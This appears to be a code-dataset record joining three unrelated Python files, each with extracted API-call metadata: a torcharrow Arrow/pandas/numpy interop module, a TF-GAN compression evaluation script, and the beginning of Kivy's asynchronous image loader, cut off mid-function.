False, 'import ctypes\n'), ((12116, 12132), 'ctypes.c_uint', 'ctypes.c_uint', (['(0)'], {}), '(0)\n', (12129, 12132), False, 'import ctypes\n'), ((978, 1013), 'struct.pack', 'struct.pack', (['"""<I"""', 'self.dwLocalAddr'], {}), "('<I', self.dwLocalAddr)\n", (989, 1013), False, 'import struct\n'), ((1217, 1253), 'struct.pack', 'struct.pack', (['"""<I"""', 'self.dwRemoteAddr'], {}), "('<I', self.dwRemoteAddr)\n", (1228, 1253), False, 'import struct\n'), ((1537, 1582), 'socket.getservbyport', 'socket.getservbyport', (['self.remote_port', '"""tcp"""'], {}), "(self.remote_port, 'tcp')\n", (1557, 1582), False, 'import socket\n'), ((1891, 1929), 'socket.gethostbyaddr', 'socket.gethostbyaddr', (['self.remote_addr'], {}), '(self.remote_addr)\n', (1911, 1929), False, 'import socket\n'), ((2389, 2410), 'ctypes.byref', 'ctypes.byref', (['closing'], {}), '(closing)\n', (2401, 2410), False, 'import ctypes\n'), ((11927, 11945), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (11939, 11945), False, 'import ctypes\n'), ((12421, 12439), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (12433, 12439), False, 'import ctypes\n'), ((11700, 11718), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (11712, 11718), False, 'import ctypes\n'), ((12193, 12211), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (12205, 12211), False, 'import ctypes\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
from typing import List, Optional, cast
# Skipping analyzing 'numpy': found module but no type hints or library stubs
import numpy as np # type: ignore
import numpy.ma as ma # type: ignore
# Skipping analyzing 'pandas': found module but no type hints or library stubs
import pandas as pd # type: ignore
import pyarrow as pa # type: ignore
import torcharrow.dtypes as dt
from torcharrow import Scope
def from_arrow_table(
table,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
scope=None,
device="",
):
""" "
Convert arrow table to a torcharrow dataframe.
"""
scope = scope or Scope.default
device = device or scope.device
assert isinstance(table, pa.Table)
if dtype is not None:
assert dt.is_struct(dtype)
dtype = cast(dt.Struct, dtype)
res = {}
for f in dtype.fields:
chunked_array = table.column(f.name)
pydata = chunked_array.to_pylist()
res[f.name] = scope.Column(pydata, f.dtype)
return scope.DataFrame(res, device=device)
else:
res = {}
table = table.select(columns) if columns is not None else table
for n in table.column_names:
chunked_array = table.column(n)
pydata = chunked_array.to_pylist()
res[n] = scope.Column(
pydata,
dtype=_arrowtype_to_dtype(
table.schema.field(n).type, table.column(n).null_count > 0
),
)
return scope.DataFrame(res, device=device)
def from_pandas_dataframe(
df,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
scope=None,
device="",
):
"""
Convert pandas dataframe to torcharrow dataframe (drops indices).
Parameters
----------
df : Pandas dataframe
dtype : dtype, default None
Data type to force, if None will automatically infer.
columns : array-like
List of column names to extract from df.
scope : Scope or None
Scope to use, or None for default scope.
device : str or ""
Device to use, or default if blank.
Examples
--------
>>> import pandas as pd
>>> import torcharrow as ta
>>> pdf = pd.DataFrame({'a': [0, 1, 2, 3],'b': [0.1, 0.2, None, 0.3]})
>>> gdf = ta.from_pandas_dataframe(pdf)
>>> gdf
index a b
------- --- ---
0 0 0.1
1 1 0.2
2 2
3 3 0.3
dtype: Struct([Field('a', int64), Field('b', Float64(nullable=True))]), count: 4, null_count: 0
"""
scope = scope or Scope.default
device = device or scope.device
if dtype is not None:
assert dt.is_struct(dtype)
dtype = cast(dt.Struct, dtype)
res = {}
for f in dtype.fields:
# this shows that Column shoud also construct Dataframes!
res[f.name] = from_pandas_series(
pd.Series(df[f.name]), f.dtype, scope=scope
)
return scope.Frame(res, dtype=dtype, device=device)
else:
res = {}
for n in df.columns:
if columns is None or n in columns:
res[n] = from_pandas_series(pd.Series(df[n]), scope=scope)
return scope.Frame(res, device=device)
def from_arrow_array(array, dtype=None, scope=None, device=""):
""" "
Convert arrow array to a torcharrow column.
"""
scope = scope or Scope.default
device = device or scope.device
assert isinstance(array, pa.Array)
pydata = _arrow_scalar_to_py(array)
if dtype is not None:
assert not dt.is_struct(dtype)
return scope.Column(pydata, dtype, device=device)
else:
return scope.Column(
pydata,
dtype=_arrowtype_to_dtype(array.type, array.null_count > 0),
device=device,
)
def from_pandas_series(series, dtype=None, scope=None, device=""):
""" "
Convert pandas series array to a torcharrow column (drops indices).
"""
scope = scope or Scope.default
device = device or scope.device
return from_numpy(series.to_numpy(), dtype, scope, device)
def from_numpy(array, dtype, scope=None, device=""):
"""
Convert 1dim numpy array to a torcharrow column (zero copy).
"""
scope = scope or Scope.default
device = device or scope.device
if isinstance(array, ma.core.MaskedArray) and array.ndim == 1:
return _from_numpy_ma(array.data, array.mask, dtype, scope, device)
elif isinstance(array, np.ndarray) and array.ndim == 1:
return _from_numpy_nd(array, dtype, scope, device)
else:
raise TypeError(f"cannot convert numpy array of type {array.dtype}")
def _is_not_str(s):
return not isinstance(s, str)
def _from_numpy_ma(data, mask, dtype, scope=None, device=""):
# adopt types
if dtype is None:
dtype = dt.typeof_np_dtype(data.dtype).with_null()
else:
assert dt.is_primitive_type(dtype)
assert dtype == dt.typeof_np_dtype(data.dtype).with_null()
# TODO if not, adopt the type or?
# Something like ma.array
# np.array([np.nan, np.nan, 3.]).astype(np.int64),
# mask = np.isnan([np.nan, np.nan, 3.]))
# create column, only zero copy supported
if dt.is_boolean_or_numerical(dtype):
assert not np.all(np.isnan(ma.array(data, mask).compressed()))
return scope._FullColumn(data, dtype=dtype, mask=mask)
elif dt.is_string(dtype) or dtype == "object":
assert np.all(np.vectorize(_is_not_str)(ma.array(data, mask).compressed()))
return scope._FullColumn(data, dtype=dtype, mask=mask)
else:
raise TypeError(f"cannot convert masked numpy array of type {data.dtype}")
def _from_numpy_nd(data, dtype, scope=None, device=""):
# adopt types
if dtype is None:
dtype = dt.typeof_np_dtype(data.dtype)
if dtype is None:
dtype = dt.string
else:
assert dt.is_primitive(dtype)
    # TODO Check why the following assert isn't the case
# assert dtype == dt.typeof_np_dtype(data.dtype)
# create column, only zero copy supported
if dt.is_boolean_or_numerical(dtype):
mask = np.isnan(data)
return scope._FullColumn(data, dtype=dtype, mask=mask)
elif dt.is_string(dtype):
mask = np.vectorize(_is_not_str)(data)
if np.any(mask):
dtype = dtype.with_null()
return scope._FullColumn(data, dtype=dtype, mask=mask)
else:
raise TypeError("can not convert numpy array of type {data.dtype,}")
# def _column_without_nan(series, dtype):
# if dtype is None or is_floating(dtype):
# for i in series:
# if isinstance(i, float) and np.isnan(i):
# yield None
# else:
# yield i
# else:
# for i in series:
# yield i
def _arrow_scalar_to_py(array):
for i in array:
yield i.as_py()
def _pandatype_to_dtype(t, nullable):
return dt.typeof_nptype(t, nullable)
def _arrowtype_to_dtype(t, nullable):
if pa.types.is_boolean(t):
return dt.Boolean(nullable)
if pa.types.is_int8(t):
return dt.Int8(nullable)
if pa.types.is_int16(t):
return dt.Int16(nullable)
if pa.types.is_int32(t):
return dt.Int32(nullable)
if pa.types.is_int64(t):
return dt.Int64(nullable)
if pa.types.is_float32(t):
return dt.Float32(nullable)
if pa.types.is_float64(t):
return dt.Float64(nullable)
if pa.types.is_list(t):
return List(t.value_type, nullable)
if pa.types.is_struct(t):
return _pandatype_to_dtype(t.to_pandas_dtype(), True)
if pa.types.is_null(t):
return dt.Void()
if pa.types.is_string(t):
return dt.String(nullable)
if pa.types.is_map(t):
return dt.Map(t.item_type, t.key_type, nullable)
raise NotImplementedError("unsupported case")
| [
"torcharrow.dtypes.is_string",
"pyarrow.types.is_float32",
"torcharrow.dtypes.Map",
"torcharrow.dtypes.Int8",
"torcharrow.dtypes.is_boolean_or_numerical",
"torcharrow.dtypes.String",
"pyarrow.types.is_float64",
"pyarrow.types.is_map",
"torcharrow.dtypes.is_struct",
"pyarrow.types.is_boolean",
"pyarrow.types.is_struct",
"torcharrow.dtypes.typeof_nptype",
"pyarrow.types.is_string",
"torcharrow.dtypes.Int32",
"torcharrow.dtypes.is_primitive_type",
"torcharrow.dtypes.Int16",
"torcharrow.dtypes.typeof_np_dtype",
"numpy.ma.array",
"pyarrow.types.is_int8",
"pyarrow.types.is_int64",
"torcharrow.dtypes.Boolean",
"pyarrow.types.is_list",
"numpy.any",
"numpy.isnan",
"pyarrow.types.is_null",
"torcharrow.dtypes.Float64",
"pyarrow.types.is_int16",
"torcharrow.dtypes.Void",
"numpy.vectorize",
"typing.cast",
"pandas.Series",
"torcharrow.dtypes.Int64",
"typing.List",
"torcharrow.dtypes.Float32",
"pyarrow.types.is_int32",
"torcharrow.dtypes.is_primitive"
] | [((5363, 5396), 'torcharrow.dtypes.is_boolean_or_numerical', 'dt.is_boolean_or_numerical', (['dtype'], {}), '(dtype)\n', (5389, 5396), True, 'import torcharrow.dtypes as dt\n'), ((6246, 6279), 'torcharrow.dtypes.is_boolean_or_numerical', 'dt.is_boolean_or_numerical', (['dtype'], {}), '(dtype)\n', (6272, 6279), True, 'import torcharrow.dtypes as dt\n'), ((7101, 7130), 'torcharrow.dtypes.typeof_nptype', 'dt.typeof_nptype', (['t', 'nullable'], {}), '(t, nullable)\n', (7117, 7130), True, 'import torcharrow.dtypes as dt\n'), ((7178, 7200), 'pyarrow.types.is_boolean', 'pa.types.is_boolean', (['t'], {}), '(t)\n', (7197, 7200), True, 'import pyarrow as pa\n'), ((7245, 7264), 'pyarrow.types.is_int8', 'pa.types.is_int8', (['t'], {}), '(t)\n', (7261, 7264), True, 'import pyarrow as pa\n'), ((7306, 7326), 'pyarrow.types.is_int16', 'pa.types.is_int16', (['t'], {}), '(t)\n', (7323, 7326), True, 'import pyarrow as pa\n'), ((7369, 7389), 'pyarrow.types.is_int32', 'pa.types.is_int32', (['t'], {}), '(t)\n', (7386, 7389), True, 'import pyarrow as pa\n'), ((7432, 7452), 'pyarrow.types.is_int64', 'pa.types.is_int64', (['t'], {}), '(t)\n', (7449, 7452), True, 'import pyarrow as pa\n'), ((7495, 7517), 'pyarrow.types.is_float32', 'pa.types.is_float32', (['t'], {}), '(t)\n', (7514, 7517), True, 'import pyarrow as pa\n'), ((7562, 7584), 'pyarrow.types.is_float64', 'pa.types.is_float64', (['t'], {}), '(t)\n', (7581, 7584), True, 'import pyarrow as pa\n'), ((7629, 7648), 'pyarrow.types.is_list', 'pa.types.is_list', (['t'], {}), '(t)\n', (7645, 7648), True, 'import pyarrow as pa\n'), ((7701, 7722), 'pyarrow.types.is_struct', 'pa.types.is_struct', (['t'], {}), '(t)\n', (7719, 7722), True, 'import pyarrow as pa\n'), ((7793, 7812), 'pyarrow.types.is_null', 'pa.types.is_null', (['t'], {}), '(t)\n', (7809, 7812), True, 'import pyarrow as pa\n'), ((7846, 7867), 'pyarrow.types.is_string', 'pa.types.is_string', (['t'], {}), '(t)\n', (7864, 7867), True, 'import pyarrow as pa\n'), ((7911, 7929), 'pyarrow.types.is_map', 'pa.types.is_map', (['t'], {}), '(t)\n', (7926, 7929), True, 'import pyarrow as pa\n'), ((824, 843), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (836, 843), True, 'import torcharrow.dtypes as dt\n'), ((860, 882), 'typing.cast', 'cast', (['dt.Struct', 'dtype'], {}), '(dt.Struct, dtype)\n', (864, 882), False, 'from typing import List, Optional, cast\n'), ((2776, 2795), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (2788, 2795), True, 'import torcharrow.dtypes as dt\n'), ((2812, 2834), 'typing.cast', 'cast', (['dt.Struct', 'dtype'], {}), '(dt.Struct, dtype)\n', (2816, 2834), False, 'from typing import List, Optional, cast\n'), ((5028, 5055), 'torcharrow.dtypes.is_primitive_type', 'dt.is_primitive_type', (['dtype'], {}), '(dtype)\n', (5048, 5055), True, 'import torcharrow.dtypes as dt\n'), ((5938, 5968), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (5956, 5968), True, 'import torcharrow.dtypes as dt\n'), ((6050, 6072), 'torcharrow.dtypes.is_primitive', 'dt.is_primitive', (['dtype'], {}), '(dtype)\n', (6065, 6072), True, 'import torcharrow.dtypes as dt\n'), ((6296, 6310), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (6304, 6310), True, 'import numpy as np\n'), ((6383, 6402), 'torcharrow.dtypes.is_string', 'dt.is_string', (['dtype'], {}), '(dtype)\n', (6395, 6402), True, 'import torcharrow.dtypes as dt\n'), ((7217, 7237), 'torcharrow.dtypes.Boolean', 'dt.Boolean', (['nullable'], {}), 
'(nullable)\n', (7227, 7237), True, 'import torcharrow.dtypes as dt\n'), ((7281, 7298), 'torcharrow.dtypes.Int8', 'dt.Int8', (['nullable'], {}), '(nullable)\n', (7288, 7298), True, 'import torcharrow.dtypes as dt\n'), ((7343, 7361), 'torcharrow.dtypes.Int16', 'dt.Int16', (['nullable'], {}), '(nullable)\n', (7351, 7361), True, 'import torcharrow.dtypes as dt\n'), ((7406, 7424), 'torcharrow.dtypes.Int32', 'dt.Int32', (['nullable'], {}), '(nullable)\n', (7414, 7424), True, 'import torcharrow.dtypes as dt\n'), ((7469, 7487), 'torcharrow.dtypes.Int64', 'dt.Int64', (['nullable'], {}), '(nullable)\n', (7477, 7487), True, 'import torcharrow.dtypes as dt\n'), ((7534, 7554), 'torcharrow.dtypes.Float32', 'dt.Float32', (['nullable'], {}), '(nullable)\n', (7544, 7554), True, 'import torcharrow.dtypes as dt\n'), ((7601, 7621), 'torcharrow.dtypes.Float64', 'dt.Float64', (['nullable'], {}), '(nullable)\n', (7611, 7621), True, 'import torcharrow.dtypes as dt\n'), ((7665, 7693), 'typing.List', 'List', (['t.value_type', 'nullable'], {}), '(t.value_type, nullable)\n', (7669, 7693), False, 'from typing import List, Optional, cast\n'), ((7829, 7838), 'torcharrow.dtypes.Void', 'dt.Void', ([], {}), '()\n', (7836, 7838), True, 'import torcharrow.dtypes as dt\n'), ((7884, 7903), 'torcharrow.dtypes.String', 'dt.String', (['nullable'], {}), '(nullable)\n', (7893, 7903), True, 'import torcharrow.dtypes as dt\n'), ((7946, 7987), 'torcharrow.dtypes.Map', 'dt.Map', (['t.item_type', 't.key_type', 'nullable'], {}), '(t.item_type, t.key_type, nullable)\n', (7952, 7987), True, 'import torcharrow.dtypes as dt\n'), ((3686, 3705), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (3698, 3705), True, 'import torcharrow.dtypes as dt\n'), ((5542, 5561), 'torcharrow.dtypes.is_string', 'dt.is_string', (['dtype'], {}), '(dtype)\n', (5554, 5561), True, 'import torcharrow.dtypes as dt\n'), ((6462, 6474), 'numpy.any', 'np.any', (['mask'], {}), '(mask)\n', (6468, 6474), True, 'import numpy as np\n'), ((3015, 3036), 'pandas.Series', 'pd.Series', (['df[f.name]'], {}), '(df[f.name])\n', (3024, 3036), True, 'import pandas as pd\n'), ((4960, 4990), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (4978, 4990), True, 'import torcharrow.dtypes as dt\n'), ((6419, 6444), 'numpy.vectorize', 'np.vectorize', (['_is_not_str'], {}), '(_is_not_str)\n', (6431, 6444), True, 'import numpy as np\n'), ((3281, 3297), 'pandas.Series', 'pd.Series', (['df[n]'], {}), '(df[n])\n', (3290, 3297), True, 'import pandas as pd\n'), ((5080, 5110), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (5098, 5110), True, 'import torcharrow.dtypes as dt\n'), ((5606, 5631), 'numpy.vectorize', 'np.vectorize', (['_is_not_str'], {}), '(_is_not_str)\n', (5618, 5631), True, 'import numpy as np\n'), ((5433, 5453), 'numpy.ma.array', 'ma.array', (['data', 'mask'], {}), '(data, mask)\n', (5441, 5453), True, 'import numpy.ma as ma\n'), ((5632, 5652), 'numpy.ma.array', 'ma.array', (['data', 'mask'], {}), '(data, mask)\n', (5640, 5652), True, 'import numpy.ma as ma\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Evaluates a TFGAN trained compression model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
import tensorflow as tf
from research.gan.image_compression import data_provider
from research.gan.image_compression import networks
from research.gan.image_compression import summaries
FLAGS = tf.app.flags.FLAGS
flags = tf.app.flags
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_string('checkpoint_dir', '/tmp/compression/',
'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/compression/',
'Directory where the results are saved to.')
flags.DEFINE_integer('max_number_of_evaluations', None,
'Number of times to run evaluation. If `None`, run '
'forever.')
flags.DEFINE_string('dataset_dir', 'testdata', 'Location of data.')
# Compression-specific flags.
flags.DEFINE_integer('batch_size', 32, 'The number of images in each batch.')
flags.DEFINE_integer('patch_size', 32, 'The size of the patches to train on.')
flags.DEFINE_integer('bits_per_patch', 1230,
'The number of bits to produce per patch.')
flags.DEFINE_integer('model_depth', 64,
'Number of filters for compression model')
def main(_, run_eval_loop=True):
with tf.name_scope('inputs'):
images = data_provider.provide_data(
'validation', FLAGS.batch_size, dataset_dir=FLAGS.dataset_dir,
patch_size=FLAGS.patch_size)
# In order for variables to load, use the same variable scope as in the
# train job.
with tf.variable_scope('generator'):
reconstructions, _, prebinary = networks.compression_model(
images,
num_bits=FLAGS.bits_per_patch,
depth=FLAGS.model_depth,
is_training=False)
summaries.add_reconstruction_summaries(images, reconstructions, prebinary)
# Visualize losses.
pixel_loss_per_example = tf.reduce_mean(
tf.abs(images - reconstructions), axis=[1, 2, 3])
pixel_loss = tf.reduce_mean(pixel_loss_per_example)
tf.summary.histogram('pixel_l1_loss_hist', pixel_loss_per_example)
tf.summary.scalar('pixel_l1_loss', pixel_loss)
# Create ops to write images to disk.
uint8_images = data_provider.float_image_to_uint8(images)
uint8_reconstructions = data_provider.float_image_to_uint8(reconstructions)
uint8_reshaped = summaries.stack_images(uint8_images, uint8_reconstructions)
image_write_ops = tf.write_file(
'%s/%s' % (FLAGS.eval_dir, 'compression.png'),
tf.image.encode_png(uint8_reshaped[0]))
# For unit testing, use `run_eval_loop=False`.
if not run_eval_loop: return
tf.contrib.training.evaluate_repeatedly(
FLAGS.checkpoint_dir,
master=FLAGS.master,
hooks=[tf.contrib.training.SummaryAtEndHook(FLAGS.eval_dir),
tf.contrib.training.StopAfterNEvalsHook(1)],
eval_ops=image_write_ops,
max_number_of_evaluations=FLAGS.max_number_of_evaluations)
if __name__ == '__main__':
app.run(_)
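
# Illustrative invocation sketch (not part of the original script); the script
# name and paths are assumptions, while the flag names match the DEFINE_* calls
# above:
#
#     python eval.py --checkpoint_dir=/tmp/compression/ \
#         --eval_dir=/tmp/compression/eval --dataset_dir=/data/patches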
| [
"research.gan.image_compression.networks.compression_model",
"tensorflow.contrib.training.StopAfterNEvalsHook",
"research.gan.image_compression.data_provider.provide_data",
"tensorflow.variable_scope",
"tensorflow.contrib.training.SummaryAtEndHook",
"absl.app.run",
"tensorflow.image.encode_png",
"research.gan.image_compression.data_provider.float_image_to_uint8",
"tensorflow.summary.histogram",
"research.gan.image_compression.summaries.stack_images",
"tensorflow.name_scope",
"tensorflow.reduce_mean",
"tensorflow.summary.scalar",
"research.gan.image_compression.summaries.add_reconstruction_summaries",
"tensorflow.abs"
] | [((2633, 2707), 'research.gan.image_compression.summaries.add_reconstruction_summaries', 'summaries.add_reconstruction_summaries', (['images', 'reconstructions', 'prebinary'], {}), '(images, reconstructions, prebinary)\n', (2671, 2707), False, 'from research.gan.image_compression import summaries\n'), ((2853, 2891), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['pixel_loss_per_example'], {}), '(pixel_loss_per_example)\n', (2867, 2891), True, 'import tensorflow as tf\n'), ((2896, 2962), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""pixel_l1_loss_hist"""', 'pixel_loss_per_example'], {}), "('pixel_l1_loss_hist', pixel_loss_per_example)\n", (2916, 2962), True, 'import tensorflow as tf\n'), ((2967, 3013), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""pixel_l1_loss"""', 'pixel_loss'], {}), "('pixel_l1_loss', pixel_loss)\n", (2984, 3013), True, 'import tensorflow as tf\n'), ((3076, 3118), 'research.gan.image_compression.data_provider.float_image_to_uint8', 'data_provider.float_image_to_uint8', (['images'], {}), '(images)\n', (3110, 3118), False, 'from research.gan.image_compression import data_provider\n'), ((3147, 3198), 'research.gan.image_compression.data_provider.float_image_to_uint8', 'data_provider.float_image_to_uint8', (['reconstructions'], {}), '(reconstructions)\n', (3181, 3198), False, 'from research.gan.image_compression import data_provider\n'), ((3220, 3279), 'research.gan.image_compression.summaries.stack_images', 'summaries.stack_images', (['uint8_images', 'uint8_reconstructions'], {}), '(uint8_images, uint8_reconstructions)\n', (3242, 3279), False, 'from research.gan.image_compression import summaries\n'), ((3872, 3882), 'absl.app.run', 'app.run', (['_'], {}), '(_)\n', (3879, 3882), False, 'from absl import app\n'), ((2109, 2132), 'tensorflow.name_scope', 'tf.name_scope', (['"""inputs"""'], {}), "('inputs')\n", (2122, 2132), True, 'import tensorflow as tf\n'), ((2151, 2274), 'research.gan.image_compression.data_provider.provide_data', 'data_provider.provide_data', (['"""validation"""', 'FLAGS.batch_size'], {'dataset_dir': 'FLAGS.dataset_dir', 'patch_size': 'FLAGS.patch_size'}), "('validation', FLAGS.batch_size, dataset_dir=\n FLAGS.dataset_dir, patch_size=FLAGS.patch_size)\n", (2177, 2274), False, 'from research.gan.image_compression import data_provider\n'), ((2398, 2428), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""generator"""'], {}), "('generator')\n", (2415, 2428), True, 'import tensorflow as tf\n'), ((2470, 2584), 'research.gan.image_compression.networks.compression_model', 'networks.compression_model', (['images'], {'num_bits': 'FLAGS.bits_per_patch', 'depth': 'FLAGS.model_depth', 'is_training': '(False)'}), '(images, num_bits=FLAGS.bits_per_patch, depth=\n FLAGS.model_depth, is_training=False)\n', (2496, 2584), False, 'from research.gan.image_compression import networks\n'), ((2786, 2818), 'tensorflow.abs', 'tf.abs', (['(images - reconstructions)'], {}), '(images - reconstructions)\n', (2792, 2818), True, 'import tensorflow as tf\n'), ((3380, 3418), 'tensorflow.image.encode_png', 'tf.image.encode_png', (['uint8_reshaped[0]'], {}), '(uint8_reshaped[0])\n', (3399, 3418), True, 'import tensorflow as tf\n'), ((3624, 3676), 'tensorflow.contrib.training.SummaryAtEndHook', 'tf.contrib.training.SummaryAtEndHook', (['FLAGS.eval_dir'], {}), '(FLAGS.eval_dir)\n', (3660, 3676), True, 'import tensorflow as tf\n'), ((3693, 3735), 'tensorflow.contrib.training.StopAfterNEvalsHook', 'tf.contrib.training.StopAfterNEvalsHook', (['(1)'], {}), 
'(1)\n', (3732, 3735), True, 'import tensorflow as tf\n')] |
'''
Asynchronous data loader
========================
This is the Asynchronous Loader. You can use it to load an image
and use it, even if data are not yet available. You must specify a default
loading image when using such a loader::
from kivy import *
image = Loader.image('mysprite.png')
You can also load image from url::
image = Loader.image('http://mysite.com/test.png')
If you want to change the default loading image, you can do::
Loader.loading_image = Image('another_loading.png')
Tweaking the asynchronous loader
--------------------------------
.. versionadded:: 1.6.0
You can now tweak the loader to have a better user experience or more
performance, depending on the images you're going to load. Take a look at the
parameters:
- :data:`Loader.num_workers` - defines the number of threads to start for
  loading images
- :data:`Loader.max_upload_per_frame` - defines the maximum number of images
  uploaded to the GPU per frame.
'''
__all__ = ('Loader', 'LoaderBase', 'ProxyImage')
from kivy import kivy_data_dir
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.cache import Cache
from kivy.core.image import ImageLoader, Image
from kivy.compat import PY2
from collections import deque
from time import sleep
from os.path import join
from os import write, close, unlink, environ
import threading
# Register a cache for loader
Cache.register('kv.loader', limit=500, timeout=60)
class ProxyImage(Image):
'''Image returned by the Loader.image() function.
:Properties:
`loaded`: bool, default to False
It can be True if the image is already cached
:Events:
`on_load`
Fired when the image is loaded and changed
'''
__events__ = ('on_load', )
def __init__(self, arg, **kwargs):
kwargs.setdefault('loaded', False)
super(ProxyImage, self).__init__(arg, **kwargs)
self.loaded = kwargs.get('loaded')
def on_load(self):
pass
class LoaderBase(object):
'''Common base for Loader and specific implementation.
By default, Loader will be the best available loader implementation.
    The _update() function is called every 1/25th of a second, or every frame
    if we have less than 25 FPS.
'''
def __init__(self):
self._loading_image = None
self._error_image = None
self._num_workers = 2
self._max_upload_per_frame = 2
self._paused = False
self._resume_cond = threading.Condition()
self._q_load = deque()
self._q_done = deque()
self._client = []
self._running = False
self._start_wanted = False
self._trigger_update = Clock.create_trigger(self._update)
def __del__(self):
try:
Clock.unschedule(self._update)
except Exception:
pass
def _set_num_workers(self, num):
if num < 2:
raise Exception('Must have at least 2 workers')
self._num_workers = num
def _get_num_workers(self):
return self._num_workers
num_workers = property(_get_num_workers, _set_num_workers)
    '''Number of workers to use while loading (used only if the loader
    implementation supports it). This setting impacts the loader only at the
    beginning. Once the loader is started, the setting has no impact::
from kivy.loader import Loader
Loader.num_workers = 4
    The default value is 2 to give a smooth user experience. You could
    increase the number of workers, then all the images will be loaded faster,
    but the user will not be able to use the application while loading.
    Prior to 1.6.0, the default number was 20, and loading many full-HD images
    was blocking the application completely.
.. versionadded:: 1.6.0
'''
def _set_max_upload_per_frame(self, num):
if num is not None and num < 1:
            raise Exception('Must have at least 1 image processing per frame')
self._max_upload_per_frame = num
def _get_max_upload_per_frame(self):
return self._max_upload_per_frame
max_upload_per_frame = property(_get_max_upload_per_frame,
_set_max_upload_per_frame)
    '''Number of images to upload per frame. By default, we'll upload only 2
    images to the GPU per frame. If you are uploading many tiny images, you can
    easily increase this parameter to 10 or more.
    If you are loading multiple Full-HD images, the upload time can be
    significant and can stall the application during the upload. If you want a
    smooth experience, keep the default.
    As a matter of fact, a Full-HD RGB image takes ~6MB in memory, so the upload
    takes time. If you have activated mipmap=True too, then the GPU must
    calculate the mipmaps of these big images too, in real time. Then it can be
    smart to reduce :data:`max_upload_per_frame` to 1 or 2. If you want to get
    rid of that (or reduce it a lot), take a look at the DDS format.
.. versionadded:: 1.6.0
'''
def _get_loading_image(self):
if not self._loading_image:
loading_png_fn = join(kivy_data_dir, 'images', 'image-loading.gif')
self._loading_image = ImageLoader.load(filename=loading_png_fn)
return self._loading_image
def _set_loading_image(self, image):
if isinstance(image, basestring):
self._loading_image = ImageLoader.load(filename=image)
else:
self._loading_image = image
loading_image = property(_get_loading_image, _set_loading_image)
'''Image used for loading.
You can change it by doing::
Loader.loading_image = 'loading.png'
.. versionchanged:: 1.6.0
Not readonly anymore.
'''
def _get_error_image(self):
if not self._error_image:
error_png_fn = join(
'atlas://data/images/defaulttheme/image-missing')
self._error_image = ImageLoader.load(filename=error_png_fn)
return self._error_image
def _set_error_image(self, image):
if isinstance(image, basestring):
self._error_image = ImageLoader.load(filename=image)
else:
self._error_image = image
error_image = property(_get_error_image, _set_error_image)
'''Image used for error.
You can change it by doing::
Loader.error_image = 'error.png'
.. versionchanged:: 1.6.0
Not readonly anymore.
'''
def start(self):
'''Start the loader thread/process'''
self._running = True
def run(self, *largs):
'''Main loop for the loader.'''
pass
def stop(self):
'''Stop the loader thread/process'''
self._running = False
def pause(self):
'''Pause the loader, can be useful during interactions
.. versionadded:: 1.6.0
'''
self._paused = True
def resume(self):
'''Resume the loader, after a :meth:`pause`.
.. versionadded:: 1.6.0
'''
self._paused = False
self._resume_cond.acquire()
self._resume_cond.notify_all()
self._resume_cond.release()
def _wait_for_resume(self):
while self._running and self._paused:
self._resume_cond.acquire()
self._resume_cond.wait(0.25)
self._resume_cond.release()
def _load(self, kwargs):
'''(internal) Loading function, called by the thread.
Will call _load_local() if the file is local,
        or _load_urllib() if the file is on the Internet.
'''
while len(self._q_done) >= (
self.max_upload_per_frame * self._num_workers):
sleep(0.1)
self._wait_for_resume()
filename = kwargs['filename']
load_callback = kwargs['load_callback']
post_callback = kwargs['post_callback']
try:
proto = filename.split(':', 1)[0]
except:
#if blank filename then return
return
if load_callback is not None:
data = load_callback(filename)
elif proto in ('http', 'https', 'ftp', 'smb'):
data = self._load_urllib(filename, kwargs['kwargs'])
else:
data = self._load_local(filename, kwargs['kwargs'])
if post_callback:
data = post_callback(data)
self._q_done.appendleft((filename, data))
self._trigger_update()
def _load_local(self, filename, kwargs):
'''(internal) Loading a local file'''
        # With recent changes to CoreImage, we must keep the data; otherwise,
        # we might be unable to recreate the texture afterwards.
return ImageLoader.load(filename, keep_data=True, **kwargs)
def _load_urllib(self, filename, kwargs):
'''(internal) Loading a network file. First download it, save it to a
temporary file, and pass it to _load_local()'''
if PY2:
import urllib2 as urllib_request
else:
import urllib.request as urllib_request
proto = filename.split(':', 1)[0]
if proto == 'smb':
try:
# note: it's important to load SMBHandler every time
                # otherwise the data is occasionally not loaded
from smb.SMBHandler import SMBHandler
except ImportError:
Logger.warning(
'Loader: can not load PySMB: make sure it is installed')
return
import tempfile
data = fd = _out_osfd = None
try:
_out_filename = ''
suffix = '.%s' % (filename.split('.')[-1])
